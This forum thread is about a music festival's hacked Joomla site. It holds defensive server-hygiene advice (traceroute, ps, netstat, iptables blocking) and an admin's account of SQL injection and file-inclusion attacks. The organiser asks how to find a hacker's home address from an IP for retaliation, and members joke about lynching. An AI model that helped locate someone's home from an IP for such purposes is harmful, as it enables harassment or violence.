Hacked again

[TexasBeth]

Man. The nightmare site is hacked again. Totally FUCKED up. THere are some pretty stiff penalties for this kind of stuff. I hope Lance takes em to task and they fry. That's some bullshit.

Walking the plank in shark infested waters somewhere in the Caribbean perhaps???!!!

 

[J-Man]

Oh crap this is getting ridiculous.

 

[shreddy]

Our guitarist Mike can totally lock down the site for you guys. He said that our site had hack attempts the moment it went up but he had some custom scripting that locked them out.

 

[Dolamite S. Biffle]

I would encourage Lance to let shaq (Greg) help him with this.

 

[MetalNations]

I would suggest moving to another hosting company.

 

[MEGALOUD]

Please send me PM's for contacts of all available help
and or suggestions, this is obviously malicious and It's time to figure out
not only how to secure it but how to take counter measures if possible.

I want to know who is targeting me if possible so I can respond accordingly
with the fullest brunt the law will allow.

 

[hvymetalchik]

This pisses me off. I hope you find out who the culprit(s) are and sick the FBI on 'em.

 

[MEGALOUD]

Anyone know how to find out more about someone's IP address? We have a hackers IP, STATE, CITY and ZIP but would love his address ; ) tried to hack us today when we were putting the site back together (LOL)

 

[axehomeyg]

Anyone know how to find out more about someone's IP address? We have a hackers IP, STATE, CITY and ZIP but would love his address ; ) tried to hack us today when we were putting the site back together (LOL)

If you are on a *nix environment, you can do a traceroute IP, which will give you all of the hops to that ip. The nearest ISP near that ip, would be the place to direct your initial legal targeting. For the most part though, alot of these hackers use run-of-the-mill bots/worms to propogate their shit onto other peoples servers. So, most likely, you'd find that the IP belongs to some other unknowing victim. The hacker bastards usually use those servers as relays for additional services or temporary warez sites, and the obnoxious/young hackers also like to screw with the people they encounter along the way (if they didn't mess with your site, they could continue parasitically abusing your server without anyone knowing). Thats the route they'd take if they got it in via some ssh bruteforce login or telnet. I'd rule out form-injection exploits because they'd only be able to screw with your database or possibly execute some malicious code with reduced permissions that webservers usually employ (no sane webserver would run with root).

You can probably check your processes (ps -awux) for any rampant perl processes or servers running that you might not be aware of. OR, you can check for a bot payload in /tmp, or /var/tmp, they'll usually dump their stuff there in a zip, expand it, then run it. Also, try 'netstat -a', to get a list of physical network connections that are being made on various ports. You'll see the usual suspects (dns, smtp, web), but you might see other stuff indicating some sort of rebroadcasting or bot activity.

The super easy solution, though, given that you already have the offending IP address is to block it with a software firewall. Your hosting provider may have a nice hardware solution in place, but if you have iptables or ipfw available, you can just keep block specific ip's using a tutorial like this...

http://www.e18.physik.tu-muenchen.de/~tnagel/ipt_recent/

Rather than go after them, having some sort of blacklist file/db feeding a software firewall would be the cheapest way to stay on top of stuff like that. Being able to run 'ban IP' at the shell or as a result of a script that monitors any brute force attacks (like hundreds of login attempts from a single ip within a given time range) usually works for most stuff.

I really despise these little hacker piss-ants. Its so nice to be on the software engineering side of things, rather than those chaos-inducing jerks. The good thing is, once you find a system that works for you for NMF, you'll be able to employ it for all of your other stuff.

Happy Hunting!

 

[axehomeyg]

ps. I can't wait to play at NMF, looking forward to the show, and to meeting ya Lance!

 

[MetalSpice]

Anyone know how to find out more about someone's IP address? We have a hackers IP, STATE, CITY and ZIP but would love his address ; ) tried to hack us today when we were putting the site back together (LOL)

Why am I picturing all of us going to this dude's house with torches and rope like in one of those old movies where the whole town goes on a lynching rampage?
I vote for the tar and feathering route...it's more of a slow and painful death.

 

[axehomeyg]

Why am I picturing all of us going to this dude's house with torches and rope like in one of those old movies where the whole town goes on a lynching rampage?
I vote for the tar and feathering route...it's more of a slow and painful death.

Good thing this isn't emo-fest. We'd be serenading this guy, outside of his house, in the hopes that the sad tunes will make him want to open a vein.

 

[MEGALOUD]

If you are on a *nix environment, you can do a traceroute IP, which will give you all of the hops to that ip. The nearest ISP near that ip, would be the place to direct your initial legal targeting. For the most part though, alot of these hackers use run-of-the-mill bots/worms to propogate their shit onto other peoples servers. So, most likely, you'd find that the IP belongs to some other unknowing victim. The hacker bastards usually use those servers as relays for additional services or temporary warez sites, and the obnoxious/young hackers also like to screw with the people they encounter along the way (if they didn't mess with your site, they could continue parasitically abusing your server without anyone knowing). Thats the route they'd take if they got it in via some ssh bruteforce login or telnet. I'd rule out form-injection exploits because they'd only be able to screw with your database or possibly execute some malicious code with reduced permissions that webservers usually employ (no sane webserver would run with root).

You can probably check your processes (ps -awux) for any rampant perl processes or servers running that you might not be aware of. OR, you can check for a bot payload in /tmp, or /var/tmp, they'll usually dump their stuff there in a zip, expand it, then run it. Also, try 'netstat -a', to get a list of physical network connections that are being made on various ports. You'll see the usual suspects (dns, smtp, web), but you might see other stuff indicating some sort of rebroadcasting or bot activity.

The super easy solution, though, given that you already have the offending IP address is to block it with a software firewall. Your hosting provider may have a nice hardware solution in place, but if you have iptables or ipfw available, you can just keep block specific ip's using a tutorial like this...

http://www.e18.physik.tu-muenchen.de/~tnagel/ipt_recent/

Rather than go after them, having some sort of blacklist file/db feeding a software firewall would be the cheapest way to stay on top of stuff like that. Being able to run 'ban IP' at the shell or as a result of a script that monitors any brute force attacks (like hundreds of login attempts from a single ip within a given time range) usually works for most stuff.

I really despise these little hacker piss-ants. Its so nice to be on the software engineering side of things, rather than those chaos-inducing jerks. The good thing is, once you find a system that works for you for NMF, you'll be able to employ it for all of your other stuff.

Happy Hunting!

THANKS FOR THE TIPS, we seemed to have found a solution for the moment, don't want to go into too much detail as you might imagine ; )
However I will certainly pass on your words to those helping !!

 

[S.L. Grandy]

What was happening was, we were a victim of sql injections and remote file inclusions. I had never even heard of these things until it happened to us several times.

Our Joomla install was the latest release 1.5.9 and at the time our virtuemart install was 1.1.2. (I am in the process of configuring 1.1.3). All of our modules were also the latest release, and I even created some custom flash ones.....and of course I had all of the file permissions set correctly. So, it wasn't necessarily anything I was doing wrong.....but it was a matter of ignorance on my part because I didn't know as much about php as I should. This can truly happen to anybody....its not a matter of if you get hacked, it's a matter of when.

I spent a good part of the day yesterday working with a developer who helped me to secure our site. We now have in place some script that will detect when someone is trying to add an exploit string and it immediately blocks their IP (and it lets them know it too....ha ha!!) and we also get a report that gives us their info. Unfortunely, as it was mentioned above, hackers bounce their IP's so catching this person is not going to be easy.....but it's not impossible.

So, here is what is going on with the site now. I have contacted our hosting company and they have completely reset our account with a fresh install. I have reinstalled Joomla 1.5.9 and Virtuemart 1.1.3. I have decided to not use our database back-up only because I am not sure if there was any hidden malicious content injected into it. So, I am very sorry to say if you were registered, you will will have to re-register because we no longer have your user info....better safe than sorry. I will have the site back up and running sometime tomorrow

Thank you everyone for your continued patience and understanding!!

~Sherry~